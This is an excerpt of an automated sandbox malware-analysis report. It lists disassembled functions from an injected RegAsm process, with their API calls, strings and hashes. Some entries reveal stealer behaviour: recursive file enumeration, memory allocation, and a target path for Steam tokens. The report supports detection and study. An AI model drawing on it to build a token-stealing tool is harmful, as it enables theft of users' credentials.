Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID: failed memory resize %u to %u bytes
API String ID: 0-2134078882
Opcode ID: 7e99ce0c9884b9bf3f24b7511bd8d7591efcff3929291d0bd05a29b973df6a9d
Instruction ID: 05e6ce081457b17b9ffdd0fb23f9c6877210e3c695989f4295689cfc94fad9cc
Opcode Fuzzy Hash: 7e99ce0c9884b9bf3f24b7511bd8d7591efcff3929291d0bd05a29b973df6a9d
Instruction Fuzzy Hash: 06D02B3AF4C2107FDB011A40FC02A8E7B928B50530F1DC524FCDC12210D632992053C3

Uniqueness

Uniqueness Score: -1.00%

Function 19C704D0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15COMMON

Download Yara Rule

Strings

failed to allocate %u bytes of memory, xrefs: 19C704E7

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID: failed to allocate %u bytes of memory
API String ID: 0-1168259600
Opcode ID: c3924c2f78941032d7cdaf32c2876a51cbc8c4e71d0c84a6915552d9b8b0b35b
Instruction ID: 8d5e4f70e915d2c47c9589f43e18b07264b457e793b825c557cff9c1582f8344
Opcode Fuzzy Hash: c3924c2f78941032d7cdaf32c2876a51cbc8c4e71d0c84a6915552d9b8b0b35b
Instruction Fuzzy Hash: C1D0122AF8C32263D6521190FC01ECA7E815BA05A1F1D9034FDCC6A260D965A85187D2

Uniqueness

Uniqueness Score: -1.00%

Function 004157E0 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 73stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,014532E8,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

lstrlen.KERNEL32(00000000,00000000,?,00000000,0042839F,?,00000000,00422B08,000000FF,?,00418576,?), ref: 00415847

Part of subcall function 00415650: Sleep.KERNEL32(000003E8,00422AB9,fA,?,?,?,00000001), ref: 00415716
Part of subcall function 00415650: CreateThread.KERNEL32(00000000,00000000,004140D0,?,00000000,00000000), ref: 00415737
Part of subcall function 00415650: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00415743

Strings

Soft\Steam\steam_tokens.txt, xrefs: 0041585F

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$CreateObjectSingleSleepThreadWaitlstrcat
String ID: Soft\Steam\steam_tokens.txt
API String ID: 2356188485-3507145866
Opcode ID: 47b29080a07d3bac26feb1bce17842fb0e49f105c5668c1486bf498ef0972044
Instruction ID: 057213227454b999660eab999351d39f71ae5e0843097ab142fe287d80eba7c3
Opcode Fuzzy Hash: 47b29080a07d3bac26feb1bce17842fb0e49f105c5668c1486bf498ef0972044
Instruction Fuzzy Hash: 0B315E71800248EACB15EBA5C906BDDBBB8AB19308F50416EF905736C2DF7C1608CAB6

Uniqueness

Uniqueness Score: -1.00%

Function 00411750 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 35memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,?,00000000,00000001,00000004,?,00413F63,00000000,00000000), ref: 0041176C

Strings

c?A, xrefs: 0041175E

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AllocLocal
String ID: c?A
API String ID: 3494564517-3973445457
Opcode ID: d4369522996f46429e2b8f99c10d083dc768b15d27a8655d7000d2a46742015a
Instruction ID: 2f6bf1855c54fdaf0a86b6469ee1b170798d26e677cda476d0f85d276026e230
Opcode Fuzzy Hash: d4369522996f46429e2b8f99c10d083dc768b15d27a8655d7000d2a46742015a
Instruction Fuzzy Hash: 6EF0EC363406151787120F5D98405A7F79EEFD5E50714426BEB68DB3A5D925DC4042E4

Uniqueness

Uniqueness Score: -1.00%

Function 00417AE0 Relevance: 2.6, APIs: 2, Instructions: 144stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004116F0: SHGetFolderPathA.SHELL32(00000000,?{B,00000000,00000000,?,?,00000000), ref: 00411728

lstrcat.KERNEL32(00000000,00000000), ref: 00417B37
lstrcat.KERNEL32(?,014616B8), ref: 00417B56

Part of subcall function 00417800: wsprintfA.USER32 ref: 00417838
Part of subcall function 00417800: FindFirstFileA.KERNEL32(?,?), ref: 0041784F

Part of subcall function 00417800: StrCmpCA.SHLWAPI(?,00428704), ref: 0041789C
Part of subcall function 00417800: StrCmpCA.SHLWAPI(?,00428708), ref: 004178B6
Part of subcall function 00417800: wsprintfA.USER32 ref: 004178DB
Part of subcall function 00417800: StrCmpCA.SHLWAPI(?,0042836E), ref: 004178EA
Part of subcall function 00417800: wsprintfA.USER32 ref: 00417907
Part of subcall function 00417800: PathMatchSpecA.SHLWAPI(?,?), ref: 00417937
Part of subcall function 00417800: lstrcat.KERNEL32(?,0145F8A0), ref: 00417963
Part of subcall function 00417800: lstrcat.KERNEL32(?,00428720), ref: 00417975
Part of subcall function 00417800: lstrcat.KERNEL32(?,?), ref: 00417983
Part of subcall function 00417800: lstrcat.KERNEL32(?,00428724), ref: 00417995
Part of subcall function 00417800: lstrcat.KERNEL32(?,?), ref: 004179A9

Part of subcall function 00417800: wsprintfA.USER32 ref: 00417926
Part of subcall function 00417800: FindNextFileA.KERNEL32(000000FF,?), ref: 00417A7A
Part of subcall function 00417800: FindClose.KERNEL32(000000FF), ref: 00417A8C

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$wsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
String ID:
API String ID: 153043497-0
Opcode ID: 2387276b7b8b7c9664f1e86e25683a9f53ba26dbb885212bccb56154d41d0255
Instruction ID: de26392101a7e2bfefa2a23e194a6feb2729e77266eca017e9eca27cf8ee7779
Opcode Fuzzy Hash: 2387276b7b8b7c9664f1e86e25683a9f53ba26dbb885212bccb56154d41d0255
Instruction Fuzzy Hash: CD51AEB1900204ABCB04EF64CC42EEE7779AB49B04F10475EFD4567292DB789B88CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 00406630 Relevance: 2.6, APIs: 2, Instructions: 71memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,00000000,00003000,00000040,00000000,?,?,?,00406AEE), ref: 0040668F
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040,?,?,00406AEE), ref: 004066C3

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 8e52c199fb5f4c61d9d5a6f440312f4a164c62c567e16456f99efbfb905a6b89
Instruction ID: 9c2575cd9cc3d2590bf8831d886fe8abcf871dfdbc43e53dc684b4ea66081c40
Opcode Fuzzy Hash: 8e52c199fb5f4c61d9d5a6f440312f4a164c62c567e16456f99efbfb905a6b89
Instruction Fuzzy Hash: 9B21B4B13407005BC334CF79DC91FA7BBEAEB80714F144A2EEA5AD63D0D67AA850C658

Uniqueness

Uniqueness Score: -1.00%

Function 00406AA0 Relevance: 1.6, APIs: 1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c69b099d378ad8cdfd24c87f9314115fb2290ea22320d676167e748dd43bceb
Instruction ID: 8a5e77b9863af6b226ff7dc5fb5ac28a5c2fe39b41e9eed2e301d918e302b378
Opcode Fuzzy Hash: 0c69b099d378ad8cdfd24c87f9314115fb2290ea22320d676167e748dd43bceb
Instruction Fuzzy Hash: 034180B5E002159BCB14DF59D941AAFB7B8AF54314F11407BE80AE7391E738ED10CB95

Uniqueness

Uniqueness Score: -1.00%

Function 19C432E7 Relevance: 1.5, APIs: 1, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(00000000,?,?), ref: 19E1F077

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 4bbbc8bbbda54acb05f7e9a8dd7812fcc70af1ef2c5241ae3dae8a8a1fae3639
Instruction ID: 729789d9cd3ec4f24ac78e3d1fade2fd2ad0052ef22a865fa06222671065489c
Opcode Fuzzy Hash: 4bbbc8bbbda54acb05f7e9a8dd7812fcc70af1ef2c5241ae3dae8a8a1fae3639
Instruction Fuzzy Hash: E8F0C236741516EBCB221A25FC00B4A275DDFE1BB6B2DC935E8659F1F0DE64D80191E0

Uniqueness

Uniqueness Score: -1.00%

Function 00411D10 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

SHFileOperationA.SHELL32(0041873A,0041873A), ref: 00411D49

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: 336d4d8b2dba9eb5ac9ae929dca5d85499c3e2856889d74d340306a8913ab722
Instruction ID: ad82ca9af257c979786628663affac42eb56b3cf1ee156bcd106859eda3eeca6
Opcode Fuzzy Hash: 336d4d8b2dba9eb5ac9ae929dca5d85499c3e2856889d74d340306a8913ab722
Instruction Fuzzy Hash: 22E0A5B0E0421D9BCB40DFE4E40469EBBF4EF48304F40816AD408A6200EB7446458BE9

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004173C0 Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 165stringmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,0098967F), ref: 004173EE
HeapAlloc.KERNEL32(00000000), ref: 004173F5
wsprintfA.USER32 ref: 0041740E
FindFirstFileA.KERNEL32(?,?), ref: 00417425
StrCmpCA.SHLWAPI(?,004286EC), ref: 0041746C
StrCmpCA.SHLWAPI(?,004286F0), ref: 00417482
wsprintfA.USER32 ref: 004174A0
FindNextFileA.KERNEL32(00000000,?), ref: 004174F8
FindClose.KERNEL32(00000000), ref: 00417507
lstrcat.KERNEL32(?,0145F8A0), ref: 0041752B
lstrcat.KERNEL32(?,01461738), ref: 0041753F
lstrlen.KERNEL32(000000FF), ref: 00417549
lstrlen.KERNEL32(000000FF), ref: 00417557

Strings

%s\*, xrefs: 00417408
pwA, xrefs: 00417579, 004174C2, 004174CA, 00417581
%s\%s, xrefs: 0041749A

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Find$FileHeaplstrcatlstrlenwsprintf$AllocCloseFirstNextProcess
String ID: %s\%s$%s\*$pwA
API String ID: 1803110163-364130743
Opcode ID: 4d7073bcb4c5c9b4c1952d97adaf5c1e491871a38b22f209f22047fcc1ab5773
Instruction ID: ee0857e10955c6073d5021abd361dbdc8db23b38c03d5012e4d9e3a533002cd5
Opcode Fuzzy Hash: 4d7073bcb4c5c9b4c1952d97adaf5c1e491871a38b22f209f22047fcc1ab5773
Instruction Fuzzy Hash: 3151D475900219ABCB10EFA0CC49FEE77B9BF09704F50459EF605A3191DB789B88CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 19D6D9E0 Relevance: 23.3, APIs: 8, Strings: 5, Instructions: 564COMMON

Download Yara Rule

Strings

API called with NULL prepared statement, xrefs: 19D6DA9B, 19D6DDFE
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19D6DACC, 19D6DE2F
misuse, xrefs: 19D6DAD6, 19D6DE39
API called with finalized prepared statement, xrefs: 19D6DAB0, 19D6DE13
%s at line %d of [%.10s], xrefs: 19D6DADB, 19D6DE3E

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-860711957
Opcode ID: ccc7eedeac4ccd8b11a373d7342f3ad37999c6dbc708d2d5092077170c947cc5
Instruction ID: 2bcd97ab7d82d13933319b357e5262c0dbfab720e0b87c8acdd6ee45b75d2868
Opcode Fuzzy Hash: ccc7eedeac4ccd8b11a373d7342f3ad37999c6dbc708d2d5092077170c947cc5
Instruction Fuzzy Hash: AB1223B09007419BE7209F34EC45B5777E8AF45358F0C452CE8D98BA92E776F488CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 19CBDB10 Relevance: 18.3, APIs: 12, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21259b02aeb20b909706c1718ba49caae641eb45e8a385ec4292836d7bfeef74
Instruction ID: d220b8d29c7f630f99633d5e07601172c9e72fa8722eec5e55093b08e519437b
Opcode Fuzzy Hash: 21259b02aeb20b909706c1718ba49caae641eb45e8a385ec4292836d7bfeef74
Instruction Fuzzy Hash: E981C6B6604301ABE710DF68EC81B6BB3E9EF84354F58142CF9C69B250EB75E9418793

Uniqueness

Uniqueness Score: -1.00%

Function 19CBDFC0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 131COMMON

Download Yara Rule

Strings

%lld %lld, xrefs: 19CBE055

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID: %lld %lld
API String ID: 0-3794783949
Opcode ID: 29757124f21bb1115c8d076ccc3dc45251bd2d1f281b6e694c563f48c2a76fc5
Instruction ID: 49e8d3efbbe1a9fc80b89c12949c1c477437201886b2816124c52d473c166ace
Opcode Fuzzy Hash: 29757124f21bb1115c8d076ccc3dc45251bd2d1f281b6e694c563f48c2a76fc5
Instruction Fuzzy Hash: 3E3117767002007FE7115B68EC45F5B77BAEFC0B50F288418F6D197291EB72E9118BA6

Uniqueness

Uniqueness Score: -1.00%

Function 19D614D0 Relevance: 16.1, APIs: 4, Strings: 5, Instructions: 360COMMON

Download Yara Rule

Strings

API called with NULL prepared statement, xrefs: 19D61571
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19D615A2
misuse, xrefs: 19D615AC
API called with finalized prepared statement, xrefs: 19D61586
%s at line %d of [%.10s], xrefs: 19D615B1

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-860711957
Opcode ID: 164dd048da86e60dc76ad66ccad49deb60ec7162efef2ca85c2d09585ec3bf13
Instruction ID: 5259997bf8ec7644cccd0508ee2d0a33cdc02e78df6ff6e52b4504ee9e0439db
Opcode Fuzzy Hash: 164dd048da86e60dc76ad66ccad49deb60ec7162efef2ca85c2d09585ec3bf13
Instruction Fuzzy Hash: 69C1F2B9E007419BE7218F34DC45B577BE8BF40354F1C452CE89A8BAA1E776E448C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 0040A660 Relevance: 13.8, APIs: 9, Instructions: 336fileCOMMON

